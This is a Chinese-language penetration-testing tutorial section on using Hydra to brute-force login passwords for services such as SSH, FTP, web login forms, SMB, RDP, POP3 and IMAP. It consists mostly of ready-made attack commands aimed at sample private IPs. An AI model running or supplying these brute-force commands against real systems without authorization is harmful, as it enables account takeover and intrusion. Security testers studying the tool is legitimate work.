8.使用hydra對端口進行爆破
如果對開啟端口的服務不清楚,請看我之前寫的文章:https://www.cnblogs.com/bmjoker/p/8833316.html
2018,網站的防護(sql,xss...)的安全保護也已經上升了一個等級,但是由於管理員的安全意識薄弱,網站弱口令漏洞依然猖獗,不信可以看補天的漏洞提交記錄,弱口令依然是漏洞中的佼佼者,當然弱口令並不僅限於網站的後臺登陸弱口令,還有端口,比如 Ftp:21,ssh:22,Telnet:23,Pop3:110,3389遠程登陸,8080中間件Tomcat,7001中間件Weblogic,3306 Mysql數據庫(phpmyadmin),1433 SQLServer數據庫,5432 Postgresql數據庫...
端口掃描不用多講,鄙人還是覺得nmap好一點,但是如何批量掃的話,丟包率可能高一點。
對於端口的爆破,首先要有一個好的字典,然後再有一個好的工具,工具的話,python腳本,超級弱口令檢測工具....這裏主要介紹kali裏面hydra的爆破,應為hydra支持幾乎所有協議的在線密碼破解,並且容錯率好,不過能不能爆破成功還是需要你有一個好的字典。
---------------------------------------------------------------
語法:
# hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns][-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT]
參數詳解:
-R 根據上一次進度繼續破解 -S 使用SSL協議連接 -s 指定端口 -l 指定用戶名 -L 指定用戶名字典(文件) -p 指定密碼破解 -P 指定密碼字典(文件) -e 空密碼探測和指定用戶密碼探測(ns)
-M <FILE>指定目標列表文件一行一條
-f 在使用-M參數以後,找到第一對登錄名或者密碼的時候中止破解。 -C 用戶名可以用:分割(username:password)可以代替-l username -p password -o <FILE>輸出文件 -t 指定多線程數量,默認為16個線程
-w TIME 設置最大超時的時間,單位秒,默認是30s -vV 顯示詳細過程 server 目標IP service 指定服務名(telnet ftp pop3 mssql mysql ssh ssh2......)
使用案例:
爆破 ssh:22 端口命令:
hydra -L users.txt -P password.txt -t 5 -vV -o ssh.txt -e ns 192.168.0.132 ssh
爆破 Ftp:21 端口命令(指定用戶名為root):
hydra -l root -P password.txt -t 5 -vV -o ftp.txt -e ns 192.168.0.132 ftp
get方式提交,破解web登錄(指定用戶名為admin):
hydra -L user.txt -p password.txt -t 線程 -vV -e ns ip http-get /admin/
hydra -l admin -p password.txt -t 線程 -vV -e ns -f ip http-get /admin/index.php
post方式提交,破解web登錄:
hydra -l admin -P password.txt -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password"
hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id=^USER^&passwd=^PASS^:<title>wrong username or password</title>"
參數說明:-t同時線程數3,-l用戶名是admin,字典pass.txt,保存為out.txt,-f 當破解了一個密碼就停止, 10.36.16.18目標ip,http-post-form表示破解是采用http的post方式提交的表單密碼破解,<title>中的內容是表示錯誤猜解的返回信息提示。
破解https:
hydra -m /index.php -l admin -P password.txt 192.168.0.132 https
破解teamspeak:
hydra -l admin -P passworrd.txt -s 端口號 -vV 192.168.0.132 teamspeak
破解cisco:
hydra -P password.txt 192.168.0.132 cisco
hydra -m cloud -P password.txt 192.168.0.132 cisco-enable
破解smb:
hydra -l administrator -P password.txt 192.168.0.132 smb
破解pop3:
hydra -l root -P password.txt my.pop3.mail pop3
破解rdp(3389端口):
hydra 192.168.0.132 rdp -l administrator -P password.txt -V
破解http-proxy:
hydra -l admin -P passwprd.txt http-proxy://192.168.0.132
破解imap:
hydra -L user.txt -p secret 192.168.0.132 imap PLAIN
hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN
就先介紹到這裏~~~
8.使用hydra對端口進行爆破